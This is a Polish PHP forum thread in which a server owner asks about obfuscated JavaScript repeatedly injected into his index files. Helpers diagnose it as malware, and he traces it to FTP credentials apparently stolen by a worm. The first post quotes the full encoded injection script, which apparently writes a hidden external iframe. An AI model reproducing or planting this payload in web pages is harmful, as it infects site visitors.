Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
 Reply to this topicStart new topic
> [PHP] Co to może być?
Tomek58
post
Post #1





Grupa: Zarejestrowani
Postów: 74
Pomógł: 0
Dołączył: 30.08.2007

Ostrzeżenie: (0%)
-----

Witam!

Mam mały problem, nie wiem dlaczego do wielu plików z rozszerzeniem .php na moim serwerze dodaje się na samym końcu kod typu:

Kod
?><script>function c32d980125q49e11f07f2685(q49e11f07f2a69){ function q49e11f07f2e54(){var q49e11f07f323a=16;return q49e11f07f323a;} return (eval('pa'+'rseInt')(q49e11f07f2a69,q49e11f07f2e54()));}function q49e11f07f3622(q49e11f07f3a1d){ function q49e11f0800c80(){var q49e11f0800f3f=2;return q49e11f0800f3f;} var q49e11f07f3df2='';q49e11f0801324=String['fromCharCode'];for(q49e11f07f41da=0;q49e11f07f41da<q49e11f07f3a1d.length;q49e11f07f41da+=q49e11f0800c80()){ q49e11f07f3df2+=(q49e11f0801324(c32d980125q49e11f07f2685(q49e11f07f3a1d.substr(q49e11f07f41da,q49e11f0800c80()))));}return q49e11f07f3df2;} var vf0='';var q49e11f080170c='3C7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E696628216D7'+vf0+'96961297'+vf0+'B646F637'+vf0+'56D656E7'+vf0+'42E7'+vf0+'7'+vf0+'7'+vf0+'2697'+vf0+'465287'+vf0+'56E657'+vf0+'363617'+vf0+'065282027'+vf0+'2533632536392536362537'+vf0+'3225363125366425363525323025366525363125366425363525336425363325333325333225
2302537'+vf0+'332537'+vf0+'32253633253364253237'+vf0+'2536382537'+vf0+'342537'+vf0+'342537'+vf0+'302533612532662532662536362536312536322536392536662536642536662537'+vf0+'342536662537'+vf0+'322532652536332536652532662537'+vf0+'332536312536662537'+vf0+'302536392537'+vf0+'302533322537'+vf0+'392537'+vf0+'342533332537'+vf0+'30253338253337'+vf0+'2537'+vf0+'342537'+vf0+'332536312536612536382536342536312532662536392536652536342536352537'+vf0+'382532652537'+vf0+'302536382537'+vf0+'30253366253237'+vf0+'2532622534642536312537'+vf0+'342536382532652537'+vf0+'322536662537'+vf0+'352536652536342532382534642536312537'+vf0+'342536382532652537'+vf0+'32253631253665253634253666253664253238253239253261253335253334253337'+vf0+'253335253330253239253262253237'+vf0+'253330253633253337'+vf0+'253633253332253332253334253633253336253333253333253635253237'+vf0+'2532302537'+vf0+'37'+vf0+'2536392536342537'+vf0+'34253638253364253332253331253339253230253638253635253639253637'+vf0+'2536382537'+vf0+'342533642533322533352533302532302537'+vf0+'332537'+vf0+'342537'+vf0+'39253663253635253364253237'+vf0+'2537'+vf0+'362536392537'+vf0+'332536392536322536392536632536392537'+vf0+'342537'+vf0+'39253361253638253639253634253634253635253665253237'+vf0+'2533652533632532662536392536362537'+vf0+'3225363125366425363525336527'+vf0+'29293B7'+vf0+'D7'+vf0+'6617'+vf0+'2206D7'+vf0+'969613D7'+vf0+'47'+vf0+'27'+vf0+'5653B3C2F7'+vf0+'3637'+vf0+'2697'+vf0+'07'+vf0+'43E';q49e11f0801eda=document;q49e11f0801eda.write(q49e11f07f3622(q49e11f080170c));</script>


Co to jest? Dodaje się samo, zaraz po ?>


--------------------
Procesor: 2,4 GHz
Dysk: 180 GB
Ramy: 1538 MB
Grafika: GeForce 256 MB
Go to the top of the page
+Quote Post
Berg
post
Post #2





Grupa: Zarejestrowani
Postów: 180
Pomógł: 37
Dołączył: 1.05.2008
Skąd: Białystok

Ostrzeżenie: (0%)
-----

Prawdopodobnie skrypt do statystyk na serwerze. Takie coś jest doklejane np. przez home.pl, powinieneś mieć możliwość wyłączenia tego u siebie w panelu.

Ten post edytował Berg 11.04.2009, 18:33:33
Go to the top of the page
+Quote Post
Tomek58
post
Post #3





Grupa: Zarejestrowani
Postów: 74
Pomógł: 0
Dołączył: 30.08.2007

Ostrzeżenie: (0%)
-----

Szczerze mówiąc pojawiło się to po zainstalowaniu modu: http://www.przemo.org/phpBB2/forum/viewtopic.php?t=65253 do forum na PHPBB. Tylko czemu kod ten dokleja się na wszystkich indexach na serwerze?

PS. Serwer dedykowany, więc to raczej nie są statystyki :/


--------------------
Procesor: 2,4 GHz
Dysk: 180 GB
Ramy: 1538 MB
Grafika: GeForce 256 MB
Go to the top of the page
+Quote Post
MWL
post
Post #4





Grupa: Zarejestrowani
Postów: 493
Pomógł: 32
Dołączył: 14.04.2008
Skąd: Lenkowski.net

Ostrzeżenie: (0%)
-----

to zapewne jakiś atak, najprawdopodobniej xss, albo ktoś wgrał ci stronę do zarządzania twoim FTP.

Ten post edytował MWL 11.04.2009, 18:59:41


--------------------
Wpadaj na mój kanał o PHP. Dużo mięsa 🥩!
Go to the top of the page
+Quote Post
mrok
post
Post #5





Grupa: Zarejestrowani
Postów: 258
Pomógł: 17
Dołączył: 22.05.2007

Ostrzeżenie: (0%)
-----

Jeśli nie wiesz skąd się to wzięło i masz zapisane hasło w programie do łaczenia się z FTP to naprawdopodobniej jest to objaw działalności jakiegoś robaka ;(

Spróbuj przeskanować czymś sytem, zmień hasło na ftp (i nie zapisuje go w programie), wywal te wpisy na końcu skryptów.
Poszukaj jeszcze na forum (tym) bo nie tylko Ty masz taki problem


--------------------
Mieszkania na Yukatanie | Casa Yucatan Real Estate
Go to the top of the page
+Quote Post
erix
post
Post #6





Grupa: Moderatorzy
Postów: 15 467
Pomógł: 1451
Dołączył: 25.04.2005
Skąd: Szczebrzeszyn/Rzeszów
90%, że jakiś syf; był o tym temat w Hydeparku.


--------------------

ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW!
Go to the top of the page
+Quote Post
Tomek58
post
Post #7





Grupa: Zarejestrowani
Postów: 74
Pomógł: 0
Dołączył: 30.08.2007

Ostrzeżenie: (0%)
-----

Z tego co zauważyłem zapisywało się tylko w plikach index.html / index.php. Zawsze w ścieżkach / i /katalog, nigdy w /katalog/katalog2. Bardzo dziwne, pierwszy raz się z czymś takim spotykam. Powstawiało nawet kod w zewnętrznych folderach stron (do każdego inny login i hasło FTP).


--------------------
Procesor: 2,4 GHz
Dysk: 180 GB
Ramy: 1538 MB
Grafika: GeForce 256 MB
Go to the top of the page
+Quote Post
patryk9200
post
Post #8





Grupa: Zarejestrowani
Postów: 319
Pomógł: 4
Dołączył: 7.02.2009
Skąd: pless

Ostrzeżenie: (0%)
-----

Miałem podobny problem:P
prawdopodobnie jest to złośliwy kod próbując włamać się do systemu odwiedzajacych twą stronę tongue.gif
jedyny sposób to jego usunięcie, sprawdź katalogi czy nie masz dziwnych plików,
wykorzystuje pewną lukę winksmiley.jpg...Jakie masz prawa do folderów??

Ten post edytował patryk9200 11.04.2009, 21:15:17
Go to the top of the page
+Quote Post
Tomek58
post
Post #9





Grupa: Zarejestrowani
Postów: 74
Pomógł: 0
Dołączył: 30.08.2007

Ostrzeżenie: (0%)
-----

Katalogi mają chmod 755.

Usuwam to, a po kilkunastu minutach nadal się pojawia :/

Edit: Problem rozpoznany. Znalazłem w logach FTP połączenia z rosyjskiego IP, widocznie jakiś robal wyciągnął zakodowane hasła z pliku Total Commandera. Wystarczy więc zmienić hasło do FTP i nie zapisywać go w programach typu TCM. :-)

Ten post edytował Tomek58 12.04.2009, 11:30:15


--------------------
Procesor: 2,4 GHz
Dysk: 180 GB
Ramy: 1538 MB
Grafika: GeForce 256 MB
Go to the top of the page
+Quote Post
« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 20.08.2025 - 19:22
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn